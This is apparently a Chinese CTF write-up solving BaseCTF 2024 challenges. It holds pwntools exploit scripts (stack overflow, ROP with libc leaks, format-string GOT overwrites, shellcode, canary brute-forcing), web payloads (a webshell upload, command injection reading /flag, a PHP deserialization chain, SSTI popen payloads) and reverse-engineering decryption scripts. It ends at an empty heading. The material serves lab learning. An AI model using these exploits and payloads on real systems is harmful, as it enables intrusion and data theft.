Pwn:
[Week1] 签个到吧:
直接nc,ls,cat flag
[Week1] echo:
只能使用echo命令
那就用echo *代替ls输出当前目录所有文件
用echo $(<flag)输出flag
[Week1] Ret2text:
简单的栈溢出
from pwn import*
p=process('./Ret2text')
p=remote('challenge.basectf.fun',33358)
backdoor=0x4011BB
payload=b'a'*0x28+p64(backdoor)
p.sendline(payload)
p.interactive()[Week1] shellcode_level0:
简单的shellcode
from pwn import*
context(arch='amd64')
p=process('./shellcode')
p=remote('challenge.basectf.fun',28688)
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()[Week1] 我把她丢了:
64位函数参数传递
from pwn import*
context(arch='amd64')
p=process('./her')
p=remote('challenge.basectf.fun',20629)
system=0x40120F
binsh=0x402008
pop_rdi=0x0000000000401196
ret=0x000000000040101a
payload=b'a'*0x78+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()[Week1] 彻底失去她:
from pwn import*
p=process('./her')
p=remote('challenge.basectf.fun',28858)
pop_rdi=0x0000000000401196
pop_rdx=0x0000000000401265
pop_rsi=0x00000000004011ad
sh=0x0000000000402065
ret=0x000000000040101a
system=0x401080
read_plt=0x401090
bss=0x4040A0
elf=ELF('./her')
main=elf.sym['main']
payload=b'a'*(0xa+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss)+p64(pop_rdx)+p64(0x100)+p64(read_plt)+p64(main)
p.sendline(payload)
sleep(0.2)
p.sendline(b'/bin/sh')
payload=b'a'*(0xa+8)+p64(ret)+p64(pop_rdi)+p64(bss)+p64(system)
p.sendline(payload)
p.interactive()[Week2] format_string_level1:
感觉都很简单
from pwn import*
p=process('./format')
p=remote('challenge.basectf.fun',48639)
target=0x4040B0
payload=b'aaaa%7$n'+p64(target)
p.sendline(payload)
p.interactive()[Week2] 她与你皆失:
from pwn import*
p=process('./her')
p=remote('challenge.basectf.fun',36442)
pop_rdi=0x0000000000401176
pop_rsi=0x0000000000401178
pop_rdx=0x0000000000401221
ret=0x000000000040101a
puts_plt=0x401060
puts_got=0x404018
main=0x4011DF
payload=b'a'*(0xa+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendline(payload)
puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
payload=b'a'*(0xa+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()[Week2] format_string_level0:
from pwn import*
p=process('./format')
p=remote('challenge.basectf.fun',22035)
payload=b'%8$s'
p.sendline(payload)
p.interactive()
#10[Week2] shellcode_level1:
from pwn import*
context(arch='amd64')
p=process('./shellcode')
p=remote('challenge.basectf.fun',47154)
def gdbs():
gdb.attach(p)
pause()
shellcode='''
syscall
'''
shellcode=asm(shellcode)
print(len(shellcode))
#gdbs()
p.send(shellcode)
shellcode=b'\x00'*2+asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()[Week3] 你为什么不让我溢出:
from pwn import*
p=process('./overpwn')
p=remote('challenge.basectf.fun',33358)
backdoor=0x4011BE
payload=b'a'*0x68
p.sendlineafter(b'Hello Hacker!',payload)
p.recvline()
p.recvline()
canary=u64(b'\x00'+p.recv(7))
print(hex(canary))
payload=b'a'*(0x70-0x8)+p64(canary)+b'a'*0x8+p64(backdoor)
p.sendline(payload)
p.interactive()[Week3] format_string_level2:
from pwn import*
p=process('./format')
p=remote('challenge.basectf.fun',35702)
elf=ELF('./format')
read_got=elf.got['read']
printf_got=elf.got['printf']
def gdbs():
gdb.attach(p)
pause()
payload=b'aaaa%7$s'+p64(read_got)
p.send(payload)
read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=read_addr-libc.sym['read']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
gadget=[0xebc81]
onegadget=libcbase+gadget[0]
payload=b'%'+str(system&0xff).encode()+b'c%10$hhn'+b'%'+str((system>>8&0xffff)-(system&0xff)).encode()+b'c%11$hn'
payload=payload.ljust(0x20,b'\x00')
payload+=p64(printf_got)+p64(printf_got+1)
p.sendline(payload)
p.interactive()
#6[Week3] stack_in_stack:
from pwn import*
context(log_level='debug')
p=process('./stack')
p=remote('challenge.basectf.fun',38027)
elf=ELF('./stack')
leave_ret=0x00000000004012f2
secret=0x4011C6
main=0x401245
start=0x4010E0
ret=0x000000000040101a
def gdbs():
gdb.attach(p)
pause()
p.recvuntil(b'0x')
buf=int(b'0x'+p.recv(12),16)
payload=p64(secret)+p64(start)
payload=payload.ljust(0x30,b'\x90')
payload+=p64(buf-8)+p64(leave_ret)
p.send(payload)
p.recvuntil(b'You found the secret!')
puts_addr=int(p.recv(15),16)
print(hex(puts_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x000000000002a3e5
p.recvuntil(b'0x')
buf=int(b'0x'+p.recv(12),16)
print(hex(buf))
payload=p64(pop_rdi)+p64(binsh)+p64(system)
payload=payload.ljust(0x30,b'\x90')
payload+=p64(buf-8)+p64(leave_ret)
#gdbs()
p.send(payload)
p.interactive()[Week3] PIE:
from pwn import*
p=process('./pie')
p=remote('challenge.basectf.fun',21887)
payload=b'a'*0x108+b'\x40\x5e'
p.send(payload)
libc_start_main=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-128
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=libc_start_main-libc.sym['__libc_start_main']
ret=libcbase+0x0000000000029139
pop_rdi=libcbase+0x000000000002a3e5
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
payload=b'a'*0x108+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.send(payload)
p.interactive()[Week4] orz!:
from pwn import*
context(arch='amd64')
p=process('./orz')
p=remote('challenge.basectf.fun',46972)
def gdbs():
gdb.attach(p)
pause()
shellcode=shellcraft.openat(0,'/flag',0)
shellcode+=shellcraft.mmap(0x1000,0x100,1,1,'rax',0)
shellcode+=shellcraft.sendfile(1,3,0,0x100)
shellcode+=shellcraft.exit()
shellcode=asm(shellcode)
p.sendline(shellcode)
p.interactive()[Week4] format_string_level3:
from pwn import*
p=process('./format')
p=remote('challenge.basectf.fun',23822)
elf=ELF('./format')
main=0x40121B
stack_fail=0x403320
puts_got=0x403318
read_got=0x403330
printf_got=0x403328
def gdbs():
gdb.attach(p)
pause()
payload=b'%'+str((main&0xff)).encode()+b'c%10$hhn'+b'%'+str((main>>8&0xffff)-(main&0xff)).encode()+b'c%11$hn'
payload=payload.ljust(0x20,b'\x00')
payload+=p64(stack_fail)+p64(stack_fail+1)
payload=payload.ljust(0x10f,b'a')
p.sendline(payload)
payload=b'aaaa%7$s'+p64(puts_got)
payload=payload.ljust(0x10f,b'a')
p.sendline(payload)
puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
payload=b'%'+str((system&0xff)).encode()+b'c%10$hhn'+b'%'+str((system>>8&0xffff)-(system&0xff)).encode()+b'c%11$hn'
payload=payload.ljust(0x20,b'\x00')
payload+=p64(printf_got)+p64(printf_got+1)
payload=payload.ljust(0x10f,b'a')
p.sendline(payload)
payload=b'/bin/sh'
p.sendline(payload)
p.interactive()
#6[Week4] 没有 canary 我要死了!:
from pwn import*
from ctypes import*
context(log_level='debug')
p=process('./canary')
p=remote('challenge.basectf.fun',21074)
def gdbs():
gdb.attach(p)
pause()
dll=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
seed=time.time()
dll.srand(int(seed))
canary=b'\x00'
for k in range(7):
for i in range(0,256):
p.sendlineafter(b'BaseCTF',str(dll.rand()%50))
payload=b'a'*0x68+canary+i.to_bytes(1,'little')
p.sendafter(b'welcome',payload)
p.recvline()
datas=p.recvline()
if b'***' in datas:
continue
else:
canary+=i.to_bytes(1,'little')
break
canary=u64(canary.ljust(8,b'\x00'))
print("canary= "+hex(canary))
#gdbs()
p.sendlineafter(b'BaseCTF',str(dll.rand()%50))
payload=b'a'*0x68+p64(canary)+b'a'*0x8+b'\xae\x12'
p.sendafter(b'welcome',payload)
p.interactive()[Week4] ezstack:
from pwn import*
p=process('./ezstack')
p=remote('challenge.basectf.fun',34973)
pop_rdi=0x00000000004006f3
pop_rbx_rbp_r12_r13_r14_r15=0x4006ea
magic=0x400658
offset=-0x30880
setvbuf_got=0x601020
gets_plt=0x4004F0
setvbuf_plt=0x400500
bss=0x601080
payload=b'a'*0x10+p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(offset&0xffffffffffffffff)+p64(setvbuf_got+0x3d)+p64(0)*4+p64(magic)
payload+=p64(pop_rdi)+p64(bss)+p64(gets_plt)
payload+=p64(pop_rdi)+p64(bss)+p64(setvbuf_plt)
p.sendline(payload)
p.sendline(b'/bin/sh')
p.interactive()Web:
[Week1] A Dark Room:
直接看源代码,直接有flag
[Week1] HTTP 是什么呀:
这里要满足条件才能给flag,但是满足后直接在网页看不见
用bp
base64解码得flag
[Week1] 喵喵喵´•ﻌ•`:
[Week1] md5绕过欸:
若比较科学计数法绕过,强比较数组绕过
[Week1] upload:
传个一句话木马,用蚁剑连接就可以找到flag了
[Week1] Aura 酱的礼物:
payload:
pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:32471/&gift=php://filter/read=convert.base64-encode/resource=flag.php[Week2] 你听不到我的声音:
cmd=a=fl;b=ag;cp /$a$b /var/www/html/b.txt[Week2] RCEisamazingwithspace:
空格过滤
cmd=tac${IFS}/flag[Week2] ez_ser:
<?php
class re{
public $chu0;
public function __toString(){
if(!isset($this->chu0)){
return "I can not believes!";
}
$this->chu0->$nononono;
}
}
class web {
public $kw;
public $dt;
public function __wakeup() {
echo "lalalla".$this->kw;
}
public function __destruct() {
echo "ALL Done!";
}
}
class pwn {
public $dusk;
public $over;
public function __get($name) {
if($this->dusk != "gods"){
echo "什么,你竟敢不认可?";
}
$this->over->getflag();
}
}
class Misc {
public $nothing;
public $flag;
public function getflag() {
eval("system('cat /flag');");
}
}
class Crypto {
public function __wakeup() {
echo "happy happy happy!";
}
public function getflag() {
echo "you are over!";
}
}
$p=new web();
$p->kw=new re();
$p->kw->chu0=new pwn();
$p->kw->chu0->dusk='gods';
$p->kw->chu0->over=new Misc();
echo urlencode(serialize($p));
?>[Week2] 所以你说你懂 MD5?:
<?php
session_start();
highlight_file(__FILE__);
// 所以你说你懂 MD5 了?
$apple = $_POST['apple'];
$banana = $_POST['banana'];
if (!($apple !== $banana && md5($apple) === md5($banana))) {
die('加强难度就不会了?');
}
// 什么? 你绕过去了?
// 加大剂量!
// 我要让他成为 string
$apple = (string)$_POST['appple'];
$banana = (string)$_POST['bananana'];
if (!((string)$apple !== (string)$banana && md5((string)$apple) == md5((string)$banana))) {
die('难吗?不难!');
}
// 你还是绕过去了?
// 哦哦哦, 我少了一个等于号
$apple = (string)$_POST['apppple'];
$banana = (string)$_POST['banananana'];
if (!((string)$apple !== (string)$banana && md5((string)$apple) === md5((string)$banana))) {
die('嘻嘻, 不会了? 没看直播回放?');
}
// 你以为这就结束了
if (!isset($_SESSION['random'])) {
$_SESSION['random'] = bin2hex(random_bytes(16)) . bin2hex(random_bytes(16)) . bin2hex(random_bytes(16));
}
// 你想看到 random 的值吗?
// 你不是很懂 MD5 吗? 那我就告诉你他的 MD5 吧
$random = $_SESSION['random'];
echo md5($random);
echo '<br />';
$name = $_POST['name'] ?? 'user';
// check if name ends with 'admin'
if (substr($name, -5) !== 'admin') {
die('不是管理员也来凑热闹?');
}
$md5 = $_POST['md5'];
if (md5($random . $name) !== $md5) {
die('伪造? NO NO NO!');
}
// 认输了, 看样子你真的很懂 MD5
// 那 flag 就给你吧
echo "看样子你真的很懂 MD5";
echo file_get_contents('/flag');apple[]=1&banana[]=2&appple=QNKCDZO&bananana=QLTHNDT&apppple=TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&banananana=TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&name=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin&md5=86d03cc0087099a697857dc510525a1f[Week2] 数学大师:
直接用WP给的脚本
import requests
import re
req = requests.session()
url = "http://challenge.basectf.fun:35473/"
answer = 0
while True:
response = req.post(url , data={"answer": answer})
print(response.text)
if "BaseCTF" in response.text:
print(response.text)
break
regex = r" (\d*?)(.)(\d*)\?"
match = re.search(regex, response.text)
if match.group(2) == "+":
answer = int(match.group(1)) + int(match.group(3))
elif match.group(2) == "-":
answer = int(match.group(1)) - int(match.group(3))
elif match.group(2) == "×":
answer = int(match.group(1)) * int(match.group(3))
elif match.group(2) == "÷":
answer = int(match.group(1)) // int(match.group(3))[Week3] ez_php_jail:
感觉WP讲得很好
当 php 版本⼩于 8 时,GET 请求的参数名含有 . ,会被转为 _ ,但是如果参数名中有 [ ,这
个 [ 会被直接转为 _ ,但是后⾯如果有 . ,这个 . 就不会被转为 _ 。
Jail[by.Happy=highlight_file(glob("/f*")[0]);[Week3] 复读机:
SSTI模板注入,稍微记一下。
方法1:
#payload1:
BaseCTF{% set chr= ''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['_''_bui''ltins_''_']['chr']%}
{% set cmd='cat '~chr(47)~'flag' %}
{%print(''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['po''pen'](cmd)['rea''d']())%}
#payload2:
% set cmd='cat '~'%c'%(47)~'flag' %}
{%print(''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['po''pen'](cmd)['rea''d']())%}
#payload3:
BaseCTF{%print(''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['po''pen']('cd $OLDPWD;cat flag')['rea''d']())%}Reverse:
[Week1] You are good at IDA:
直接从IDA里面找flag的字符串
[Week1] UPX mini:
脱壳,然后base64解码
[Week1] ez_maze:
在shift+F12找到地图,走最短路径,把路径MD5编码
BaseCTF{131b7d6e60e8a34cb01801ae8de07efe}
[Week1] Ez Xor:
用动态调试找出result和key,根据异或规则,写出脚本解密
result=[ 0x01, 0x09, 0x05, 0x25, 0x26, 0x2D, 0x0B, 0x1D, 0x24, 0x7A,
0x31, 0x20, 0x1E, 0x49, 0x3D, 0x67, 0x4D, 0x50, 0x08, 0x25,
0x2E, 0x6E, 0x05, 0x34, 0x22, 0x40, 0x3B, 0x25]
key=list("Xnp[kw^hzQeyTb|W\x7FcJ|fMye@vhC")
flag=''
for i in range(0,28):
flag+=chr(result[i]^ord(key[27-i]))
print(flag)[Week1] BasePlus:
先把密文异或0xe
然后base64换表,这里要注意,如果原始表是64位要补到65位
import base64
result='bxhtLgTgAy92bfH6jJAhKlcGSgNljmThKmPt0oJ/<'
biao=str.maketrans('/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=')
flag=base64.b64decode(result.translate(biao))
print(flag)[Week2] UPX:
手脱upx壳然后base64换表
[Week2] 喝杯下午茶:
#include <stdio.h>
#include <string.h>
#include <emmintrin.h>
#include <stdint.h>
void decrypt(unsigned int *v, unsigned int *k) {
unsigned int v0=v[0],v1=v[1];
int delta=1131796;
int sum=delta*32;
unsigned int k0 = k[0],k1 = k[1],k2 = k[2],k3 = k[3];
for (int i = 0; i < 32; i++) {
v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
sum -= delta;
}
v[0] = v0;
v[1] = v1;
}
int main() {
int Buf2[10]={0x94B1F1E7,0x21D5D352,0x5247793D,0x40D1C97,0xF36E7F74,0x9C53F70F,0x6AEACFD8,0x6F9F06F4,0xEAFD9E2E,0x32B655F7};
unsigned int key[] = {0x11223344, 0x55667788, 0x99AABBCC, 0xDDEEFF11};
char buf[50] = {0};
memcpy(buf, Buf2, sizeof Buf2);
for(int i=0;i<=8;i+=2)
{
decrypt((unsigned int *)&buf+i, key);
}
printf("%s", buf);
return 0;
}[Week2] Ezpy:
用pydumpck把exe转为pyc,补全魔术头。生成PY,key在输出的pyc文件里,也转成py
# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.10
import Key
import sys
def init_Sbox(seed):
k_b = (lambda .0 = None: [ ord(seed[i % len(seed)]) for i in .0 ])(range(256))
s = list(range(256))
j = 0
for i in range(256):
j = (j + s[i] + k_b[i]) % 256
s[i] = s[j]
s[j] = s[i]
return s
def KeyStream(text, Sbox):
s = Sbox.copy()
(i, j) = (0, 0)
k = [
0] * len(text)
for r in range(len(text)):
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i] = s[j]
s[j] = s[i]
t = (s[i] + s[j]) % 256
k[r] = s[t] ^ Key.keykey[r % len(Key.keykey)]
return k
def Encrypt(text, seed):
Sbox = init_Sbox(seed)
key = KeyStream(text, Sbox)
enc = (lambda .0 = None: [ text[i] ^ key[i] for i in .0 ])(range(len(text)))
return bytes(enc)
enc = b'\xe6\xaeC~F\xf2\xe3\xbb\xac\x9a-\x02U\x85p\xeb\x19\xd1\xe4\xc93sG\xb0\xeb1\xb5\x05\x05\xc3\xd7\x00\x18+D\xbc\x0cO\x9em\xf1\xbd'
flag = input('Please input Your flag:')
flag = (lambda .0: [ ord(i) for i in .0 ])(flag)
flag = Encrypt(flag, Key.key)
if flag != enc:
print("It's not flag!")
continue
print('You are right!')
sys.exit(1)
continue
return None解密
import sys
# 替换为实际的 Key 模块内容
class Key:
key = 'yOU_f1nd_m3' # 替换为实际的密钥
keykey =[
66,
97,
115,
101] # 替换为实际的密钥流
def init_Sbox(seed):
k_b = [ord(seed[i % len(seed)]) for i in range(256)]
s = list(range(256))
j = 0
for i in range(256):
j = (j + s[i] + k_b[i]) % 256
s[i], s[j] = s[j], s[i] # Fixed swapping
return s
def KeyStream(text, Sbox):
s = Sbox.copy()
i, j = 0, 0
k = [0] * len(text)
for r in range(len(text)):
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i] # Fixed swapping
t = (s[i] + s[j]) % 256
k[r] = s[t] ^ Key.keykey[r % len(Key.keykey)]
return k
def Encrypt(text, seed):
Sbox = init_Sbox(seed)
key = KeyStream(text, Sbox)
enc = [text[i] ^ key[i] for i in range(len(text))]
return bytes(enc)
enc = b'\xe6\xaeC~F\xf2\xe3\xbb\xac\x9a-\x02U\x85p\xeb\x19\xd1\xe4\xc93sG\xb0\xeb1\xb5\x05\x05\xc3\xd7\x00\x18+D\xbc\x0cO\x9em\xf1\xbd'
flag = Encrypt(enc, Key.key)
print(flag)[Week2] RivestCipher:
比较抽象,蒙出来的,RC4,找出密文和密钥解密就行。
[Week2] lk:
from z3 import*
k=[Int('k[%d]'%i)for i in range(21)]
s=Solver()
s.add(948 * k[20]
+ 887 * k[19]
+ 410 * k[18]
+ 978 * k[17]
+ 417 * k[16]
+ 908 * k[15]
+ 965 * k[14]
+ 987 * k[13]
+ 141 * k[12]
+ 257 * k[11]
+ 323 * k[10]
+ 931 * k[9]
+ 773 * k[8]
+ 851 * k[7]
+ 758 * k[6]
+ 891 * k[5]
+ 575 * k[4]
+ 616 * k[3]
+ 860 * k[2]
+ 283 * k[1] == 913686)
s.add(938 * k[20]
+ 490 * k[19]
+ 920 * k[18]
+ 50 * k[17]
+ 568 * k[16]
+ 68 * k[15]
+ 35 * k[14]
+ 708 * k[13]
+ 938 * k[12]
+ 718 * k[11]
+ 589 * k[10]
+ 954 * k[9]
+ 974 * k[8]
+ 62 * k[7]
+ 580 * k[6]
+ 80 * k[5]
+ 111 * k[4]
+ 151 * k[3]
+ 421 * k[2]
+ 148 * k[1] == 630335)
s.add(908 * k[20]
+ 590 * k[19]
+ 668 * k[18]
+ 222 * k[17]
+ 489 * k[16]
+ 335 * k[15]
+ 778 * k[14]
+ 622 * k[13]
+ 95 * k[12]
+ 920 * k[11]
+ 932 * k[10]
+ 892 * k[9]
+ 409 * k[8]
+ 392 * k[7]
+ 11 * k[6]
+ 113 * k[5]
+ 948 * k[4]
+ 674 * k[3]
+ 506 * k[2]
+ 182 * k[1] == 707525)
s.add(479 * k[20]
+ 859 * k[19]
+ 410 * k[18]
+ 399 * k[17]
+ 891 * k[16]
+ 266 * k[15]
+ 773 * k[14]
+ 624 * k[13]
+ 34 * k[12]
+ 479 * k[11]
+ 465 * k[10]
+ 728 * k[9]
+ 447 * k[8]
+ 427 * k[7]
+ 890 * k[6]
+ 570 * k[5]
+ 716 * k[4]
+ 180 * k[3]
+ 571 * k[2]
+ 707 * k[1] == 724203)
s.add(556 * k[20]
+ 798 * k[19]
+ 380 * k[18]
+ 716 * k[17]
+ 71 * k[16]
+ 901 * k[15]
+ 949 * k[14]
+ 304 * k[13]
+ 142 * k[12]
+ 679 * k[11]
+ 459 * k[10]
+ 814 * k[9]
+ 282 * k[8]
+ 49 * k[7]
+ 873 * k[6]
+ 169 * k[5]
+ 437 * k[4]
+ 199 * k[3]
+ 771 * k[2]
+ 807 * k[1] == 688899)
s.add(465 * k[20]
+ 898 * k[19]
+ 979 * k[18]
+ 198 * k[17]
+ 156 * k[16]
+ 831 * k[15]
+ 856 * k[14]
+ 322 * k[13]
+ 25 * k[12]
+ 35 * k[11]
+ 369 * k[10]
+ 917 * k[9]
+ 522 * k[8]
+ 654 * k[7]
+ 235 * k[6]
+ 385 * k[5]
+ 469 * k[4]
+ 231 * k[3]
+ 496 * k[2]
+ 83 * k[1] == 604784)
s.add(305 * k[20]
+ 928 * k[19]
+ 260 * k[18]
+ 793 * k[17]
+ 787 * k[16]
+ 708 * k[15]
+ 758 * k[14]
+ 236 * k[13]
+ 688 * k[12]
+ 747 * k[11]
+ 711 * k[10]
+ 195 * k[9]
+ 50 * k[8]
+ 648 * k[7]
+ 787 * k[6]
+ 376 * k[5]
+ 220 * k[4]
+ 33 * k[3]
+ 194 * k[2]
+ 585 * k[1] == 665485)
s.add(767 * k[20]
+ 573 * k[19]
+ 22 * k[18]
+ 909 * k[17]
+ 598 * k[16]
+ 588 * k[15]
+ 136 * k[14]
+ 848 * k[12]
+ 964 * k[11]
+ 311 * k[10]
+ 701 * k[9]
+ 653 * k[8]
+ 541 * k[7]
+ 443 * k[6]
+ 7 * k[5]
+ 976 * k[4]
+ 803 * k[3]
+ 273 * k[2]
+ 859 * k[1] == 727664)
s.add(776 * k[20]
+ 59 * k[19]
+ 507 * k[18]
+ 164 * k[17]
+ 397 * k[16]
+ 744 * k[15]
+ 377 * k[14]
+ 768 * k[13]
+ 456 * k[12]
+ 799 * k[11]
+ 9 * k[10]
+ 215 * k[9]
+ 365 * k[8]
+ 181 * k[7]
+ 634 * k[6]
+ 818 * k[5]
+ 81 * k[4]
+ 236 * k[3]
+ 883 * k[2]
+ 95 * k[1] == 572015)
s.add(873 * k[20]
+ 234 * k[19]
+ 381 * k[18]
+ 423 * k[17]
+ 960 * k[16]
+ 689 * k[15]
+ 617 * k[14]
+ 240 * k[13]
+ 933 * k[12]
+ 300 * k[11]
+ 998 * k[10]
+ 773 * k[9]
+ 484 * k[8]
+ 905 * k[7]
+ 806 * k[6]
+ 792 * k[5]
+ 606 * k[4]
+ 942 * k[3]
+ 422 * k[2]
+ 789 * k[1] == 875498)
s.add(766 * k[20]
+ 7 * k[19]
+ 283 * k[18]
+ 900 * k[17]
+ 211 * k[16]
+ 305 * k[15]
+ 343 * k[14]
+ 696 * k[13]
+ 590 * k[12]
+ 736 * k[11]
+ 817 * k[10]
+ 603 * k[9]
+ 414 * k[8]
+ 828 * k[7]
+ 114 * k[6]
+ 845 * k[5]
+ 175 * k[4]
+ 212 * k[3]
+ 898 * k[2]
+ 988 * k[1] == 714759)
s.add(220 * k[20]
+ 30 * k[19]
+ 788 * k[18]
+ 106 * k[17]
+ 574 * k[16]
+ 501 * k[15]
+ 366 * k[14]
+ 952 * k[13]
+ 121 * k[12]
+ 996 * k[11]
+ 735 * k[10]
+ 689 * k[9]
+ 998 * k[8]
+ 689 * k[7]
+ 729 * k[6]
+ 886 * k[5]
+ 860 * k[4]
+ 70 * k[3]
+ 466 * k[2]
+ 961 * k[1] == 778853)
s.add(313 * k[20]
+ 748 * k[19]
+ 522 * k[18]
+ 864 * k[17]
+ 156 * k[16]
+ 362 * k[15]
+ 283 * k[14]
+ 49 * k[13]
+ 316 * k[12]
+ 79 * k[11]
+ 136 * k[10]
+ 299 * k[9]
+ 271 * k[8]
+ 604 * k[7]
+ 907 * k[6]
+ 540 * k[5]
+ 141 * k[4]
+ 620 * k[3]
+ 701 * k[2]
+ 866 * k[1] == 584591)
s.add(922 * k[20]
+ 399 * k[19]
+ 425 * k[18]
+ 26 * k[17]
+ 159 * k[16]
+ 224 * k[15]
+ 438 * k[14]
+ 770 * k[13]
+ 144 * k[12]
+ 406 * k[11]
+ 110 * k[10]
+ 991 * k[9]
+ 749 * k[8]
+ 701 * k[7]
+ 646 * k[6]
+ 147 * k[5]
+ 979 * k[4]
+ 674 * k[3]
+ 999 * k[2]
+ 913 * k[1] == 717586)
s.add(13 * k[20]
+ 537 * k[19]
+ 225 * k[18]
+ 421 * k[17]
+ 153 * k[16]
+ 484 * k[15]
+ 654 * k[14]
+ 743 * k[13]
+ 779 * k[12]
+ 74 * k[11]
+ 325 * k[10]
+ 439 * k[9]
+ 797 * k[8]
+ 41 * k[7]
+ 784 * k[6]
+ 269 * k[5]
+ 454 * k[4]
+ 725 * k[2]
+ 164 * k[1] == 537823)
s.add(591 * k[20]
+ 210 * k[19]
+ 874 * k[18]
+ 204 * k[17]
+ 485 * k[16]
+ 42 * k[15]
+ 433 * k[14]
+ 176 * k[13]
+ 436 * k[12]
+ 634 * k[11]
+ 82 * k[10]
+ 978 * k[9]
+ 818 * k[8]
+ 683 * k[7]
+ 404 * k[6]
+ 562 * k[5]
+ 41 * k[4]
+ 789 * k[3]
+ 200 * k[2]
+ 220 * k[1] == 587367)
s.add(584 * k[20]
+ 597 * k[19]
+ 928 * k[18]
+ 532 * k[17]
+ 902 * k[16]
+ 858 * k[15]
+ 820 * k[14]
+ 240 * k[13]
+ 124 * k[12]
+ 899 * k[11]
+ 848 * k[10]
+ 822 * k[9]
+ 409 * k[8]
+ 491 * k[7]
+ 587 * k[6]
+ 715 * k[5]
+ 410 * k[4]
+ 268 * k[3]
+ 721 * k[2]
+ 915 * k[1] == 842245)
s.add(421 * k[20]
+ 302 * k[19]
+ 327 * k[18]
+ 180 * k[17]
+ 512*k[16]
+ 160 * k[15]
+ 623 * k[14]
+ 28 * k[13]
+ 411 * k[12]
+ 53 * k[11]
+ 633 * k[10]
+ 560 * k[9]
+ 623 * k[8]
+ 477 * k[7]
+ 901 * k[6]
+ 287 * k[5]
+ 149 * k[4]
+ 726 * k[3]
+ 934 * k[2]
+ 875 * k[1] == 610801)
s.add(838 * k[20]
+ 434 * k[19]
+ 792 * k[18]
+ 649 * k[17]
+ 462 * k[16]
+ 170 * k[15]
+ 980 * k[14]
+ 15 * k[13]
+ 295 * k[12]
+ 495 * k[11]
+ 666 * k[10]
+ 934 * k[9]
+ 17 * k[8]
+ 69 * k[7]
+ 367 * k[6]
+ 780 * k[5]
+ 291 * k[4]
+ 834 * k[3]
+ 587 * k[2]
+ 133 * k[1] == 653127)
s.add(41 * k[20]
+ 422 * k[19]
+ 420 * k[18]
+ 224 * k[17]
+ 475 * k[16]
+ 854 * k[15]
+ 233 * k[14]
+ 179 * k[13]
+ 620 * k[12]
+ 69 * k[11]
+ 42 * k[10]
+ 684 * k[9]
+ 300 * k[8]
+ 745 * k[7]
+ 894 * k[6]
+ 554 * k[5]
+ 495 * k[4]
+ 66 * k[3]
+ 316 * k[2]
+ 391 * k[1] == 533470)
if s.check()==sat:
ans=s.model()
for i in range(1,21):
print(chr(ans[k[i]].as_long()),end='')[Week2] 最简单的编码:
只能用脚本解,减去对应的key
table = "CDABGHEFKLIJOPMNSTQRWXUVabYZefcdijghmnklqropuvstyzwx23016745+/89"
enc = "TqK1YUSaQryEMHaLMnWhYU+Fe0WPenqhRXahfkV6WE2fa3iRW197Za62eEaD"
index = []
number = [1,2,3,4]
for i in range(len(enc)):
tmp = table.index(enc[i]) - number[i % 4]
if tmp >= 0:
index.append(tmp)
else:
index.append(tmp + 64)
print(index)
for i in range(0,len(index),4):
a = index[i]
b = index[i + 1]
c = index[i + 2]
d = index[i + 3]
sum = a << 18 | b << 12 | c << 6 | d
for j in range(3):
print(chr((sum >> ((2 - j) * 8)) & 0xff),end="")[Week3] Dont-debug-me:
